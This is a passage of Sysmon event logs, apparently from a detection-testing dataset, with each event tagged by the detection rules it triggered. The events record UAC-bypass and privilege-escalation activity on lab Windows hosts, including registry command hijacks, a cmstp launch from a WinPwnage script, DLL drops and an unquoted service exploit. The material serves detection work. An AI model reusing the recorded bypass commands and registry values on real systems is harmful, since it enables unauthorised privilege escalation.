Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"c:\\users\\ieuser\\appdata\\local\\temp","EventType":"SetValue","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-6CE5-5CD5-0000-00104BC61B00","ProcessId":4076,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Volatile Environment\\SYSTEMROOT","UtcTime":"2019-05-10 12:21:57.270"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":15635,"Execution":{"#attributes":{"ProcessID":2016,"ThreadID":2012}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-10T12:21:57.286666Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-10 12:06:06.896","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-6CE5-5CD5-0000-00104BC61B00","ProcessId":4076,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\system32\\mmc.exe","UtcTime":"2019-05-10 12:22:02.434"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15636,"Execution":{"#attributes":{"ProcessID":2016,"ThreadID":2012}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-10T12:22:02.434314Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-08-03 11:23:15.519","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-6EA3-5D45-0000-0010204DE100","ProcessId":7984,"RuleName":"PrivEsc - UAC Bypass UACME 30","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\wow64log.dll","UtcTime":"2019-08-03 11:23:15.519"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":5401,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-03T11:23:15.560614Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ProcessGuid":"365ABB72-9570-5CD3-0000-00103FC90A00","ProcessId":1900,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\control.exe\\(Default)","UtcTime":"2019-05-09 03:25:24.552"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":11264,"Execution":{"#attributes":{"ProcessID":1988,"ThreadID":228}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-09T03:25:24.630445Z"}},"Version":2}}}},{"detection":["Sdclt Child Processes"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /name Microsoft.BackupAndRestoreCenter","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\onedrive\\","Description":"Windows Command Processor","FileVersion":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","Hashes":"SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-94CD-5CD3-0000-0020DD3A0100","LogonId":"0x13add","ParentCommandLine":"\"C:\\Windows\\system32\\sdclt.exe\" ","ParentImage":"C:\\Windows\\System32\\sdclt.exe","ParentProcessGuid":"365ABB72-9DA4-5CD3-0000-00102E692F00","ParentProcessId":3184,"ProcessGuid":"365ABB72-9DA4-5CD3-0000-00107F7A2F00","ProcessId":2920,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-09 03:25:24.677"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":11267,"Execution":{"#attributes":{"ProcessID":1988,"ThreadID":228}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-09T03:25:25.067945Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"c:\\Users\\IEUser\\Tools\\PrivEsc\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-3B92-5EB5-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"c:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-4640-5EB7-0000-0010EF364B01","ParentProcessId":372,"ProcessGuid":"747F3D96-4647-5EB7-0000-0010B3454B01","ProcessId":7672,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-05-10 00:09:43.370"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":112972,"Execution":{"#attributes":{"ProcessID":2728,"ThreadID":3432}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-05-10T00:09:43.372595Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-11 17:28:17.363","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-0631-5CD7-0000-0010C5862100","ProcessId":2460,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\tmp.ini","UtcTime":"2019-05-11 17:28:17.363"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":16037,"Execution":{"#attributes":{"ProcessID":2008,"ThreadID":1992}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-11T17:28:17.363930Z"}},"Version":2}}}},{"detection":["Bypass UAC via CMSTP"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\System32\\cmstp.exe\" /au c:\\users\\ieuser\\appdata\\local\\temp\\tmp.ini","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\WinPwnage-master\\WinPwnage-master\\","Description":"Microsoft Connection Manager Profile Installer","FileVersion":"7.02.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=7B1FF39621D704665F392CB19171B8337E042D7D,MD5=00263CA2071DC9A6EE577EB356B0D1D9,SHA256=AE11B4CD277731BA5D218A2FDB22D19EA5F2780256BC481E86ACBD8ED4CCF1C4,IMPHASH=152AEE2AB20419D44875B94A2E5E3387","Image":"C:\\Windows\\System32\\cmstp.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-F9CD-5CD6-0000-002065370100","LogonId":"0x13765","ParentCommandLine":"python winpwnage.py -u uac -i 17 -p c:\\windows\\System32\\cmd.exe","ParentImage":"C:\\Python27\\python.exe","ParentProcessGuid":"365ABB72-0631-5CD7-0000-0010C5862100","ParentProcessId":2460,"ProcessGuid":"365ABB72-0633-5CD7-0000-0010C6A02100","ProcessId":3840,"Product":"Microsoft(R) Connection Manager","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-11 17:28:19.442"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":16038,"Execution":{"#attributes":{"ProcessID":2008,"ThreadID":1992}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-11T17:28:19.567055Z"}},"Version":5}}}},{"detection":["CMSTP Execution Registry Event"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\ProgramData\\Microsoft\\Network\\Connections\\Cm","EventType":"SetValue","Image":"C:\\Windows\\system32\\DllHost.exe","ProcessGuid":"365ABB72-0545-5CD7-0000-001078371F00","ProcessId":3044,"RuleName":"","TargetObject":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\cmmgr32.exe\\ProfileInstallPath","UtcTime":"2019-05-11 17:28:22.488"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":16039,"Execution":{"#attributes":{"ProcessID":2008,"ThreadID":1992}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-11T17:28:22.598305Z"}},"Version":2}}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-3384-5EA5-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":596,"ProcessGuid":"747F3D96-B755-5EA4-0000-0010D06E2500","ProcessId":4484,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-04-25 22:19:01.724"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":27334,"Execution":{"#attributes":{"ProcessID":2752,"ThreadID":3576}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-04-25T22:19:02.057201Z"}},"Version":5}}}},{"detection":["Renamed Binary"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"c:\\Program Files\\vulnsvc\\mmm.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\program.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-B764-5EA4-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","ParentImage":"C:\\Windows\\System32\\services.exe","ParentProcessGuid":"747F3D96-B764-5EA4-0000-00106F550000","ParentProcessId":584,"ProcessGuid":"747F3D96-B766-5EA4-0000-0010E7880100","ProcessId":2856,"Product":"Microsoft® Windows® Operating System","RuleName":"PrivEsc - Potential Unquoted Service Exploit","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-04-25 22:19:18.317"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":27636,"Execution":{"#attributes":{"ProcessID":2796,"ThreadID":3572}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-04-25T22:19:28.080717Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-10 13:49:29.789","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-8169-5CD5-0000-0010D7982300","ProcessId":3552,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\NTWDBLIB.dll","UtcTime":"2019-05-10 13:49:29.789"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15706,"Execution":{"#attributes":{"ProcessID":1980,"ThreadID":1948}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-10T13:49:29.789907Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-10 13:49:34.899","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-816E-5CD5-0000-0010FEB62300","ProcessId":1700,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-10 13:49:34.899"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15707,"Execution":{"#attributes":{"ProcessID":1980,"ThreadID":1948}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-10T13:49:34.946157Z"}},"Version":2}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /groups","Company":"Microsoft Corporation","CurrentDirectory":"C:\\temp\\PowerShell-Suite-master\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-26E1-5CDA-0000-002087350100","LogonId":"0x13587","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-28A0-5CDA-0000-001074181300","ParentProcessId":2016,"ProcessGuid":"365ABB72-28D0-5CDA-0000-00103A6B1300","ProcessId":2676,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-14 02:32:48.290"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17715,"Execution":{"#attributes":{"ProcessID":2024,"ThreadID":2004}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-14T02:32:48.290682Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\whoami.exe\" /groups","Company":"Microsoft Corporation","CurrentDirectory":"C:\\temp\\PowerShell-Suite-master\\","Description":"whoami - displays logged on user information","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"Medium","LogonGuid":"365ABB72-26E1-5CDA-0000-002087350100","LogonId":"0x13587","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"365ABB72-28A0-5CDA-0000-001074181300","ParentProcessId":2016,"ProcessGuid":"365ABB72-28D0-5CDA-0000-0010F76F1300","ProcessId":3964,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-14 02:32:48.342"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":17717,"Execution":{"#attributes":{"ProcessID":2024,"ThreadID":2004}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-14T02:32:48.359432Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-11 16:46:10.344","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-FC52-5CD6-0000-0010357F1200","ProcessId":3812,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\CRYPTBASE.dll","UtcTime":"2019-05-11 16:46:10.344"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15970,"Execution":{"#attributes":{"ProcessID":2008,"ThreadID":1992}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-11T16:46:10.344282Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-05-11 16:46:15.484","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-FC57-5CD6-0000-00101FAF1200","ProcessId":3884,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-11 16:46:15.484"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15972,"Execution":{"#attributes":{"ProcessID":2008,"ThreadID":1992}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-11T16:46:15.547407Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"(Empty)","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B07F-5D46-0000-001031A90F04","ProcessId":1768,"RuleName":"PrivEsc - UAC bypass UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-04 10:16:31.415"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5944,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-04T10:16:31.476803Z"}},"Version":2}}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Windows\\system32\\cmd.exe /c start C:\\Windows\\system32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B07F-5D46-0000-0010F1B20F04","ProcessId":2444,"RuleName":"PrivEsc - UAC bypass UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\(Default)","UtcTime":"2019-08-04 10:16:31.572"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5946,"Execution":{"#attributes":{"ProcessID":2780,"ThreadID":3676}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-08-04T10:16:31.609571Z"}},"Version":2}}}},{"detection":["Wsreset UAC Bypass","Bypass UAC via WSReset.exe"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c start C:\\Windows\\system32\\cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-56A3-5D45-0000-0020B3D31800","LogonId":"0x18d3b3","ParentCommandLine":"\"C:\\Windows\\system32\\WSReset.exe\" ","ParentImage":"C:\\Windows\\System32\\WSReset.exe","ParentProcessGuid":"747F3D96-B080-5D46-0000-0010D4EA0F04","ParentProcessId":2112,"ProcessGuid":"747F3D96-B091-5D46-0000-001081F71104","ProcessId":820,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-08-04 